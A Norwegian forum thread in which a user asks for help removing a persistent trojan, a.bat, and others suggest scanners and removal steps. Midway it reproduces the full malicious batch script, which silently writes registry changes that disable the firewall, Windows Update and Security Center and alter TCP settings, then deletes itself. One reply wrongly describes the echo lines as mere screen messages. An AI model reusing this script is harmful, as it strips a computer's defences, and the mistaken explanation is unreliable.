Trojaner

30 innlegg i emnet

Skrevet

Hei...

Sliter litt med trojanere for tiden, har fått en på C:\ som heter a.bat.

Jeg scanner med AVG og sletter den, men vær forbanna gang kommer den opp igjen...

Den legger seg også til sånn at den starter da maskinen starter, slettet den fra oppstart, men neste gang jeg skrur på pc'en så er den der igjen...

Med denne trojaneren tror jeg det fulgte med flere, for plutselig har jeg masse virus (som jeg ikke hadde før denne kom)...

Noen tips på hvordan jeg kan fjærne alt av virus?

Hjelper ikke å slette virusene med AVG, de kommer bare opp igjen...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Kan prøve dette:

Start maskinen i sikkerhetsmodus med nettverk, og lim dette inn i start - kjør:

iexplore http://housecall.antivirus.com/housecall/start_pcc.asp <-- Virussjekk

iexplore http://www.ewido.net/en/onlinescan/ <-- Virus og spywaresjekk.

Sørg for at skjulte filer og mapper vises: Åpne en mappe -> verktøy -> mappealternativer -> Vis -> skjulte filer og mapper -> bruk på alle mapper. :)

Deretter kan du legge ut en hijackthislogg. Lastes ned her (øverst til høyre på siden): http://www.hijackthis.de/

Endret av KongKlykken
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Gå i sikkerhetsmodus ved å trykke F8 under start, videre velger du "sikkerhetsmodus med nettverk" og logger deg inn på brukeren din.

Så åpner du start--->kjør og skriver:

iexplore http://www.bitdefender.com/scan8/ie.html

iexplore http://www.ewido.com/en

Skriv dette hver for seg...

Ewido fjerner altså spyware/malware, mens bitdefender tar det som er av virus

EDIT: var litt sen der:P

Scan med bitdefender i tillegg til housecall ;)

Her er hijackthis :)

Endret av Gamezor
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

her finner du et programm som vil slette dine trojanere.

det programmet heter Trojan Remover v6.2.1. her finner du også HiJackThis. ligger litt ned på siden.

nod32burde fjerne det også-- er 30 dagers trial men er jo å laste ned å søke gjennom. så kan du jo fjerne det igjen.

Endret av DearDevil90
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

her finner du et programm som vil slette dine trojanere.

det programmet heter Trojan Remover v6.2.1. her finner du også HiJackThis. ligger litt ned på siden.

nod32burde fjerne det også-- er 30 dagers trial men er jo å laste ned å søke gjennom. så kan du jo fjerne det igjen.

Testet dine programmer først:

Den første linken fungerte det ikke å downloade noen ting...

Nod32 har jeg prøvd før, men det bare kødder med pc'en min så jeg vil ikke prøve igjen...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

HER burde du klare å få lastet det ned fra. jeg har god erfaring med dette programmet.. lykke til!! Endret av DearDevil90
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Har trådstarter fått fikset problemet :)?

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Nei, desverre...

Gjort akkurat som dere sa, men det kommer bare fler å fler å de jeg sletter kommer tilbake ved neste boot...

Noen andre forslag?

Nå skal jeg prøve en gang til ved å gå inn i sikkerhetsmodus å prøve...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Kanskje den har fulgt med i et program du har installert i det siste, kanskje du burde se på kontroll panel, legg til/fjern og se om du kjenner igjen et program du har installert i det siste.. Jeg hadde også samme problem for lenge siden, jeg slettet de siste programmene jeg installerte, og det funket fint for meg.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Hmm

Jeg testet igjen, men klarte ikkeå fjærne alt...

Er 100% sikker på at det ikke fulgte med noe JEG innstalerte...

Jeg fikk tak i scriptet på a.bat:

@echo off

Echo REGEDIT4>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg

Echo "TransportBindName"="">>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg

Echo "Start"=dword:00000004>>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg

Echo "Start"=dword:00000004>>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>%temp%\1.reg

Echo "Start"=dword:00000004>>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]>>%temp%\1.reg

Echo "EnableDCOM"="N">>%temp%\1.reg

Echo "EnableRemoteConnect"="N">>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>%temp%\1.reg

Echo "restrictanonymous"=dword:00000001>>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT1.0\Server]>>%temp%\1.reg

Echo "Enabled"=hex:00>>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>%temp%\1.reg

Echo "AutoShareWks"=dword:00000000>>%temp%\1.reg

Echo "AutoShareServer"=dword:00000000>>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]>>%temp%\1.reg

Echo "NameServer"="">>%temp%\1.reg

Echo "ForwardBroadcasts"=dword:00000000>>%temp%\1.reg

Echo "IPEnableRouter"=dword:00000000>>%temp%\1.reg

Echo "Domain"="">>%temp%\1.reg

Echo "SearchList"="">>%temp%\1.reg

Echo "UseDomainNameDevolution"=dword:00000001>>%temp%\1.reg

Echo "EnableICMPRedirect"=dword:00000000>>%temp%\1.reg

Echo "DeadGWDetectDefault"=dword:00000001>>%temp%\1.reg

Echo "DontAddDefaultGatewayDefault"=dword:00000000>>%temp%\1.reg

Echo "EnableSecurityFilters"=dword:00000001>>%temp%\1.reg

Echo "AllowUnqualifiedQuery"=dword:00000000>>%temp%\1.reg

Echo "PrioritizeRecordData"=dword:00000001>>%temp%\1.reg

Echo "TCP1320Opts"=dword:00000003>>%temp%\1.reg

Echo "KeepAliveTime"=dword:00023280>>%temp%\1.reg

Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\1.reg

Echo "BcastNameQueryCount"=dword:00000001>>%temp%\1.reg

Echo "CacheTimeout"=dword:0000ea60>>%temp%\1.reg

Echo "Size/Small/Medium/Large"=dword:00000003>>%temp%\1.reg

Echo "LargeBufferSize"=dword:00001000>>%temp%\1.reg

Echo "SynAckProtect"=dword:00000002>>%temp%\1.reg

Echo "PerformRouterDiscovery"=dword:00000000>>%temp%\1.reg

Echo "EnablePMTUBHDetect"=dword:00000000>>%temp%\1.reg

Echo "FastSendDatagramThreshold "=dword:00000400>>%temp%\1.reg

Echo "StandardAddressLength "=dword:00000018>>%temp%\1.reg

Echo "DefaultReceiveWindow "=dword:00004000>>%temp%\1.reg

Echo "DefaultSendWindow"=dword:00004000>>%temp%\1.reg

Echo "BufferMultiplier"=dword:00000200>>%temp%\1.reg

Echo "PriorityBoost"=dword:00000002>>%temp%\1.reg

Echo "IrpStackSize"=dword:00000004>>%temp%\1.reg

Echo "IgnorePushBitOnReceives"=dword:00000000>>%temp%\1.reg

Echo "DisableAddressSharing"=dword:00000000>>%temp%\1.reg

Echo "AllowUserRawAccess"=dword:00000000>>%temp%\1.reg

Echo "DisableRawSecurity"=dword:00000000>>%temp%\1.reg

Echo "DynamicBacklogGrowthDelta"=dword:00000032>>%temp%\1.reg

Echo "FastCopyReceiveThreshold"=dword:00000400>>%temp%\1.reg

Echo "LargeBufferListDepth"=dword:0000000a>>%temp%\1.reg

Echo "MaxActiveTransmitFileCount"=dword:00000002>>%temp%\1.reg

Echo "MaxFastTransmit"=dword:00000040>>%temp%\1.reg

Echo "OverheadChargeGranularity"=dword:00000001>>%temp%\1.reg

Echo "SmallBufferListDepth"=dword:00000020>>%temp%\1.reg

Echo "SmallerBufferSize"=dword:00000080>>%temp%\1.reg

Echo "TransmitWorker"=dword:00000020>>%temp%\1.reg

Echo "DNSQueryTimeouts" =hex(7):31,00,00,00,32,00,00,00,32,00,00,00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\1.reg

Echo "DefaultRegistrationTTL"=dword:00000014>>%temp%\1.reg

Echo "DisableReplaceAddressesInConflicts"=dword:00000000>>%temp%\1.reg

Echo "DisableReverseAddressRegistrations"=dword:00000001>>%temp%\1.reg

Echo "UpdateSecurityLevel "=dword:00000000>>%temp%\1.reg

Echo "DisjointNameSpace"=dword:00000001>>%temp%\1.reg

Echo "QueryIpMatching"=dword:00000000>>%temp%\1.reg

Echo "NoNameReleaseOnDemand"=dword:00000001>>%temp%\1.reg

Echo "EnableDeadGWDetect"=dword:00000000>>%temp%\1.reg

Echo "EnableFastRouteLookup"=dword:00000001>>%temp%\1.reg

Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\1.reg

Echo "MaxHashTableSize"=dword:00000800>>%temp%\1.reg

Echo "SackOpts"=dword:00000001>>%temp%\1.reg

Echo "Tcp1323Opts"=dword:00000003>>%temp%\1.reg

Echo "TcpMaxDupAcks"=dword:00000001>>%temp%\1.reg

Echo "TcpRecvSegmentSize"=dword:00000585>>%temp%\1.reg

Echo "TcpSendSegmentSize"=dword:00000585>>%temp%\1.reg

Echo "TcpWindowSize"=dword:0007d200>>%temp%\1.reg

Echo "DefaultTTL"=dword:00000030>>%temp%\1.reg

Echo "TcpMaxHalfOpen"=dword:0000004b>>%temp%\1.reg

Echo "TcpMaxHalfOpenRetried"=dword:00000050>>%temp%\1.reg

Echo "TcpTimedWaitDelay"=dword:00000000>>%temp%\1.reg

Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\1.reg

Echo "FFPControlFlags"=dword:00000001>>%temp%\1.reg

Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\1.reg

Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\1.reg

Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\1.reg

Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\1.reg

Echo "EnablePMTUDiscovery"=dword:00000001>>%temp%\1.reg

Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\1.reg

Echo.>>%temp%\1.reg

Echo  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]>>%temp%\1.reg

Echo "MaxConnectionsPer1_0Server"=dword:00000050>>%temp%\1.reg

Echo "MaxConnectionsPerServer"=dword:00000050>>%temp%\1.reg

Echo.>>%temp%\1.reg

START /WAIT REGEDIT /S %temp%\1.reg

DEL %temp%\1.reg

DEL %0

Kjører dere dette scriptet på maskinen får dere MASSE virus

Noen som kan fortelle meg hva dette gjør og kansje hvordan jeg fjærner det også?

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Det kan jeg ikke, men har du tatt en scan med hijackthis?

og lagt loggen der inn på www.hijackthis.de?

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Har du denne filen på oppstart??

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Har du denne filen på oppstart??

Jeg har sletta den fra oppstart mange ganger, men den kommer opp igjen av seg selv...

Kan noen forklare meg hva den gjør?

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

ehm, altså den starter jo opp av seg selv.. Og gjør alt det som står i den.. Men du har vel gått på sikkerhets modus og slettet den derfra??

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Her er et bilde av det HijackThis fant:

Klikk Her

Noen som kan si meg hva dette er?

Jeg har uTorrent kjørende om det har noe å si...

EDIT:

ehm, altså den starter jo opp av seg selv.. Og gjør alt det som står i den.. Men du har vel gått på sikkerhets modus og slettet den derfra??

Ja, jeg har prøvd det også...

Endret av Kyogre
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Da vet jeg ikke.. Det jeg hadde gjort da var å formatert pc'en..

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Sitter å leser litt i .bat filen og finner ut at den gjør mye fa*****skap... Men jeg finner ikke noen plass at den kopierer seg selv, så da har du en annen fil som kopierer inn denne filen etter at du har slettet den. Jeg ville gjort følgende:

Installer et antispyware program.

Installer AVG Free eller Avast4. Husk å oppdatere definisjonsfil.

Gjør ALT i Safe Mode med nettverk:

- Kjør CCleaner og slett rubbel og bil (Registry rens og tempfiler rens)

- Kjør AVG/Avast4 og fjern det som kommer opp.

- Scan med et antispyware program (ad-aware, windows defender, avg antispyware)

- Scan med housecall, ewido og bit-saken som Gamezor nevnte (Han har nevnt dette i mange tråder her)

- kjør en HijackThis og legg inn på hijacthis.de. Finn feilen, og fjern denne via HijackThis (Kanskje litt risky, viss du ikke vet hva du gjør)

Start så maskinen på nytt i "vanlig modus" og kjør en virusscan med AVG/Avast4 igjen her.

Jeg vet at dette kommer til å ta lang tid, men det er hva jeg ville ha gjort...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Post gjerne HJT-loggen :)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Jeg leste gjennom bat-filen, ved første øyekast virker det som forvirring, men ser mer alvorlig ut når jeg studerer den nærmere.

Alt med "@echo" eller "echo" foran er meldinger som blir vist til skjerm - ikke kjørbare instruksjoner.

Bruken av tegn ">>" dirigerer imidlertid instruksjonene videre til en fil eller annen "StandardOutput" - i dette tilfelle registeret.

Du har trolig "noe" på maskinen, men jeg er mer usikker på hvor alvorlig det er.

Virus-advarsler fra Antivirus-programmer du ikke har installert selv ? Betydelig overdrevet, men programmet er installert via en trojan (eks.: Trojan.Zlob), og du har antagelig også SpyWare på PC'en.

Jeg prøvde å gå inn på de 2 IP-adressene som ble funnet som mistenkelige, men fikk ikke forbindelse med noe som helst - IP 130-67-15-198 og 130-67-68-68.

Maskinen er muligens "under attack", men sannsynligvis er det meste av dette bløff i form av falske meldinger og popups.

Bat-filen var veldig informativ, den gjør det mulig for meg å sammenligne Register-entrys mot kjente trusler - i Symantecs "A - Z list" over virus og trusler.

Her kommer 2 spørsmål jeg ikke trenger svar på:

1. Har du vært innom noen nettsteder med "for fristende tilbud" om "free downloads", hackertools, keygen, cracks, online gambling eller lignende ?

2. Har du "blitt dratt inn" på nettsteder med annet innhold enn den du egentlig åpnet ?

Grunnleggende råd for å avgrense problemet:

1. Ikke foreta Systemgjenoppretting i Windows - dette "lagrer" problemet til et senere tidspunkt.

Funksjonen bør midlertidig disables.

2. Ikke svar ja til noen popupmeldingers tilbud.

3. Ikke godta oppdateringer av programmer med mindre du er helt sikker på hva dette er.

4. Ikke godta oppdatering av programmer på et uventet tidspunkt - f.eks. når du skrur av maskinen. Hvis du klikker på Avslutt vil dialogen "Installere oppdateringer og avslutte ?" være unormal.

Virusscan med seriøst og kjent program, ikke med "Virusprotect 3.5 Pro" eller lignende. Enkelte tilbyr online virusscan av maskinen.

Jeg kan gi ytterligere svar - men gi litt mer beskrivelse av situasjonen først.

Endret av Morten58
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Jeg lasta ned å kjørte AVG Anti Spyware i sikkerhets modus...

Tok også en AVG Anti Virus i sikkerhets modus...

Jeg har fått fjærnet all driten untatt et par ting som bare kommer opp i Trojan Remover å ikke i AVG...

Screenshot:

viruscw5.jpg

Screenshot etter jeg har prøvd å fjærne den med Trojan Remover:

virus2bg0.jpg

Trojan Remover finner også et problem til...

Screenshot:

virus3kf1.jpg

Noen som vet hvordan jeg kan fjærne disse?

Tror jeg har fjærnet alt av dritt bortsett fra disse...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Sikkerhetsmodus? Prøvd det? Slike alvorlige ting bør kjøres via sikkerhetsmodus. :)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Her kommer 2 spørsmål jeg ikke trenger svar på:

1. Har du vært innom noen nettsteder med "for fristende tilbud" om "free downloads", hackertools, keygen, cracks, online gambling eller lignende ?

2. Har du "blitt dratt inn" på nettsteder med annet innhold enn den du egentlig åpnet ?

Grunnleggende råd for å avgrense problemet:

1. Ikke foreta Systemgjenoppretting i Windows - dette "lagrer" problemet til et senere tidspunkt.

Funksjonen bør midlertidig disables.

2. Ikke svar ja til noen popupmeldingers tilbud.

3. Ikke godta oppdateringer av programmer med mindre du er helt sikker på hva dette er.

4. Ikke godta oppdatering av programmer på et uventet tidspunkt - f.eks. når du skrur av maskinen. Hvis du klikker på Avslutt vil dialogen "Installere oppdateringer og avslutte ?" være unormal.

Har ikke vært inne på sånne nettsider du nevner, og bruker Opera som nettleser...

Har heller ikke blitt dratt inn på andre nett sider...

Det var godt du sa det med system gjenoppretting, det var nesten så jeg gjorde det istad...

Har ikke fått PoP-Ups, aldrig vært plaget med det heller...

Jeg har AVG Internet Security som kommer opp med en besked om noe vill gå på internett, har ikke klikka godkjenn på ting jeg ikke vet hva er, eller som ikke jeg har satt på akkurat det tidspunktet...

Men hvis jeg feks. går på komplett.no og bestiller en hardisk å betaler med Visa, er det noen sjangs for at den vil hente info for å tappe kortet?

EDIT:

Sikkerhetsmodus? Prøvd det? Slike alvorlige ting bør kjøres via sikkerhetsmodus.

Alt er gjort i sikkerthetsmodus...

Endret av Kyogre
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

ok... Se om du kan få deaktivert de programmene/filene det gjelder med Sysinternals Autoruns fra microsoft: http://www.microsoft.com/technet/sysintern...s/AutoRuns.mspx

Om du får det til, så kjører du spyware/virus programmet en gang til. :)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Nytter lite med sikkermodus og et titalls antiscannere så lenge du ikke deaktiverer systemgjenoppretting og tømmer mappa til System Restore...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Nytter lite med sikkermodus og et titalls antiscannere så lenge du ikke deaktiverer systemgjenoppretting og tømmer mappa til System Restore...

Og dette gjør jeg hvordan?

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!


Start en konto

Logg inn

Har du allerede en konto? Logg inn her.


Logg inn nå

  • Hvem er aktive   0 medlemmer

    Ingen innloggede medlemmer aktive